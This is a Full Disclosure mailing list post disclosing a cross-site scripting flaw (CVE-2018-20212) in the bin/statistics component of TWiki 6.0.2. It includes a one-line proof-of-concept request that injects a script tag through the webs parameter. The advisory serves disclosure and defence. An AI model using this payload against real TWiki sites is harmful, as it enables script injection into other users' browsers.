Full Disclosure mailing list archives
/bin/statistics in TWiki 6.0.2 allows XSS via the webs parameter(CVE-2018-20212)
From: "zzt0907" <16362505 () qq com>
Date: Thu, 3 Jan 2019 08:19:21 +0800
# bin/statistics in TWiki 6.0.2 allows XSS via the webs parameter(CVE-2018-20212) ## Vulnerability Type Cross Site Scripting (XSS) ## Vendor of Product: twiki ## Affected Product Version twiki - 6.0.2 ## Affected Component twiki/bin/statistics ## Attack Type Remote ## Attack Vectors /twiki/bin/statistics?webs=<script>alert(1)</script> ## Credit This vulnerability was discovered by Jiawang Zhang Coordination Center of China (CNCERT/CC) ## Product Download http://twiki.org/cgi-bin/view/Codev/DownloadTWiki ## References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20212 _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- /bin/statistics in TWiki 6.0.2 allows XSS via the webs parameter(CVE-2018-20212) zzt0907 (Jan 04)